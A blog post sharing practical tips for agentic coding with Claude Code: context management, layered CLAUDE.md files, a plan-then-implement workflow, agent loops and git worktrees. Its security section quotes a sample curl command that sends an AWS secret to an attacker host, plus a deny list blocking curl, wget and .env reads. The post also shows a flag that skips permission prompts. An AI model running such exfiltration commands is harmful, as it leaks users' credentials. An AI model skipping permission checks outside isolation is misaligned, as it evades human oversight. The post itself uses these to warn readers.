Agentic Coding Data Dump

20 February, 2026

LLMs' coding capabilities have been advancing rapidly and causing massive disruption. In this post, I'll cover some loosely connected data points about the current meta; the examples use Claude.

LLM Amnesia

LLMs are stateless. New session, new context window.

Context Engineering

Context engineering means curating the most relevant tokens in the context window for a given task. LLMs struggle with recall in large context windows, so strive to reset around the 40%–50% mark.

Useful cheatsheet:

  • To visualize your context window, run the /context command.
  • In Claude Code, run the /clear command to reset the context window.
  • Opinionated, but I prefer to disable auto-compaction so I control what stays in the context window rather than letting /compact decide.
  • Use /resume to resume a previous conversation (conversations are saved per working directory).
  • Run /init to generate a CLAUDE.md file.

Set up a custom status line to view your context percentage in real time.
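
Wiring one up looks roughly like this in ~/.claude/settings.json (statusLine is a real setting; the script below and the exact stdin fields it reads are illustrative and vary by version):

{
  "statusLine": {
    "type": "command",
    "command": "~/.claude/statusline.sh"
  }
}

The command receives session metadata as JSON on stdin, so a minimal ~/.claude/statusline.sh could be:

#!/usr/bin/env bash
# Read the session JSON from stdin and print a one-line status.
input=$(cat)
echo "$(echo "$input" | jq -r '.model.display_name') | $(echo "$input" | jq -r '.workspace.current_dir')"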

Protect Your Context

The input tokens you and your agent feed the LLM determine its performance. View your initial new-session usage percentage via the /context command, and keep it as low as possible without compromising agent enablement. Review all your memory files, MCP servers, skills, and tools to ensure they are relevant; stale memory files could be your biggest bottleneck when trying to be productive with a coding agent. It's also worth noting that because LLMs work via next-token prediction, you should never argue with the model: arguing only reinforces statistically bad behavior. Instead, create a handoff and start over.
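
A handoff can be a short pseudo prompt like this before you /clear (the wording and the handoff.md filename are illustrative):

Summarize this session for a fresh agent: the goal, decisions made,
files touched, dead ends hit, and what remains. Write it to handoff.md
so the next session starts from there with a clean context window.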

Layered Knowledge

When creating memory files, it's better to layer knowledge around the workspace instead of cramming it all into one root CLAUDE.md file. Claude Code has a built-in feature where it lazy-loads nested CLAUDE.md files while traversing directories.

In practice, in a typical full-stack repo, this would mean defining your database migration patterns and naming conventions in the packages/backend/../db/migrations/CLAUDE.md path rather than in the root of the project.

You can generate these files by running the /init command. Be sure to keep them updated. There is a skill for that.
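
As an illustration, a nested CLAUDE.md next to your migrations might contain nothing more than the local rules (contents hypothetical):

# Database migrations
- Name migrations YYYYMMDDHHMM__short_description.sql.
- Never edit an applied migration; add a follow-up migration instead.
- Every migration ships with a matching rollback script.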

Security

Agents cannot be trusted, and LLMs are vulnerable to prompt injection. Sandboxing them in an isolated dev environment helps mitigate system risks, but as long as a compromised agent has internet access, it can exfiltrate data with a command as simple as curl www.attacker.com/steal?q=aws_secret=0HNOTHI5I5BAD, and you are pwned. Be warned: the dev machine is an attack surface.
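
One cheap mitigation sketch, assuming Claude Code permission rules (patterns illustrative; deny rules only stop the obvious paths, so real isolation means blocking egress at the network level):

{
  "permissions": {
    "deny": [
      "Bash(curl:*)",
      "Bash(wget:*)",
      "Read(./.env)"
    ]
  }
}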

ERPI - Epic, Research, Plan, Implement Methodology

Epic

The initial prompt. Voice record, transcribe, or write down a specification of what you want to achieve. Avoid ambiguity. This step is your highest leverage point, so put in the effort. Tools like Wispr Flow are nice, but for a while I just voice-recorded on WhatsApp and transcribed the .ogg files to text.
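
If you go the DIY route, the open-source whisper CLI is one way to transcribe those voice notes locally (model choice is yours):

# Transcribe a WhatsApp voice note to plain text
whisper voice-note.ogg --model base --output_format txt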

Research

Send a coding agent off to explore the current codebase and relevant documentation. Review and validate the output. Research should describe the current state of the codebase, not make implementation suggestions. Be wary of this; one strategy to avoid it is to generate a list of research questions from the initial epic.md, then send the agent off to answer them without any context about why it is researching, as in the pseudo prompt below.
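
Pseudo prompt (wording is illustrative):

Read epic.md. Produce a numbered list of concrete research questions
about the current codebase and its documentation that must be answered
before planning. Output questions only: no answers, no implementation
suggestions.

A second, fresh agent then answers the questions into research_output.md without ever seeing the epic.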

Plan

The implementation plan is generated by combining research_output.md and epic.md. Review and refine it until it aligns with your mental model of how the system should work and evolve. Unused features create unnecessary complexity; remember YAGNI while ensuring the system stays extendable.

Notes before the implementation step

Non-deterministic coding agents thrive on determinism. You can accidentally steer a model in the wrong direction; you cannot accidentally steer a type checker. Ask Claude "is this code good?" and it says something entirely different every time, same model, same code. Type checkers, unit tests, and linters give the model deterministic feedback.

Time spent on tooling infrastructure compounds as a codebase grows, so it's worth investing time in the setup.
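
For example, a single deterministic gate the agent can run after every change (the script names are illustrative):

# Fails loudly, and identically, every time the code is wrong
npm run typecheck && npm run lint && npm test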

Implement

Once the plan is prepared and reviewed, send off the coding agent and wait for the asynchronous task to complete. To avoid permission fatigue, run the agent in a sandboxed environment where you can let it skip permission prompts. If that's not possible, configure a solid set of permissions & purchase a giant enter button from China like I did.
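
In a sandbox, skipping the prompts looks like this (the flag is real; use it only in an isolated environment with no secrets mounted):

claude -p "Implement plan.md" --dangerously-skip-permissions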

Tips on Iterating on the Spec

Specs are contracts. When iterating on the markdown outputs, I leave XML annotations before feeding them back to the LLM to revise. I also recommend git-staging the previous draft so you can diff-review it after changes and confirm you haven't lost critical spec information.

# Annotation example
<ant> Change ORM from Prisma to Sequelize V6 </ant>  
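
The stage-then-diff review flow looks roughly like this (the plan.md filename is illustrative):

# Stage the current draft, let the agent revise, then review exactly what changed
git add plan.md
claude -p "Apply the <ant> annotations in plan.md, then remove them."
git diff plan.md   # confirm no spec information was lost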

[Screenshot: a real annotation example from one of my codebases]

Ralph Wiggum Loop

Agent control flow. Running coding agents in for-loops is a simple yet surprisingly effective way to manage context and complete large tasks: each iteration starts a fresh session, so the context window never silently degrades.

Pseudo bash

#!/usr/bin/env bash
# Run a fresh agent per iteration until the PRD is complete (capped as a safety net).
MAX_ITERATIONS=20
for ((i = 1; i <= MAX_ITERATIONS; i++)); do
  result=$(claude -p "@prd.json @progress.txt \
    1. Pick the highest-priority unfinished feature and implement only that one. \
    2. Update the PRD and append progress to progress.txt for the next developer. \
    3. Git commit the feature. \
    If the PRD is complete, output <promise>COMPLETE</promise>.")
  echo "$result"
  if [[ "$result" == *"<promise>COMPLETE</promise>"* ]]; then
    echo "PRD complete, exiting."
    exit 0
  fi
done

Pseudo prompt

Convert my feature requirements into structured PRD items.
Each item should have: category, description, skills, 
mcps, steps_to_verify, and passes: false.
Format as JSON. Be specific about acceptance criteria.

Pseudo tasks.json

[{
  "task_description": "Add dark mode button",
  "steps_to_verify": [
    "CSS mode changes",
    "Icon toggles",
    "Theme state persists across reloads"
  ],
  "passes": false
}]

Parallelism and Git Worktrees

Git worktrees, a built-in Git feature that has become very popular, let you check out multiple branches from the same repository into separate directories simultaneously. This allows coding agents to work on features without stepping over each other; it's how Vibe Kanban / Cursor Agents work under the hood. Although promising, agents still need a tight feedback loop such as local dev servers and tests, which is not always trivial when running multiple agents from one machine. I attempted to solve this by building my own SDLC tool over a weekend called haflow.
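
The core commands are straightforward (paths and branch names are illustrative):

# One directory per agent, each on its own branch
git worktree add ../myrepo-auth -b feature/auth
git worktree add ../myrepo-darkmode -b feature/darkmode

# List active worktrees, and clean up after merging
git worktree list
git worktree remove ../myrepo-auth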

Closing Notes

Much of what I know comes from watching the best, playing around, and just being curious. So go out there and get your hands dirty: run a Ralph loop, write your own agent, and try tools, but keep your setup simple and manageable, and burn all your tokens!

  • Tracer bullets: Small pieces of functionality built end-to-end to validate that what you are going to do on a large scale is even possible with your approach, read more about it here!
  • MCP Bloat: MCPs can bloat the context window with unnecessary tokens. In some cases, it could be beneficial to create in-house project tools for querying data instead of relying on a prebuilt holistic MCP solution. Example: a custom /get-ticket.sh script.
  • Terminal multiplexers are cool: I use tmux, here's a setup blog.
  • Communication: There is a lot to learn about how we communicate with LLMs from classic technical programming books. Open one up!
  • Learning tests are code you write not to build a feature, but to prove how an external system behaves. When working with closed-source APIs, tools, or binaries, you can ask the agent to create a test that confirms behavior; interfaces can change, so checking these tests in and running them in CI can be worthwhile for critical third-party dependencies. A sketch follows this list.
  • Assumptions made during research propagate through the planning and implementation stages. A wrong assumption discovered at implementation forces you to redo everything upstream; learning tests catch these early, when the cost of being wrong is cheap.
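
A learning-test sketch in bash, against a made-up third-party ticket API (the endpoint and field are hypothetical):

#!/usr/bin/env bash
# Learning test: prove the third-party API still returns the field we depend on.
set -euo pipefail
response=$(curl -s https://api.example.com/v1/tickets/123)
# jq -e exits non-zero if .status is missing or null
echo "$response" | jq -e '.status' > /dev/null \
  || { echo "FAIL: ticket payload no longer has .status"; exit 1; }
echo "PASS"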

Happy Prompting!

Link dump: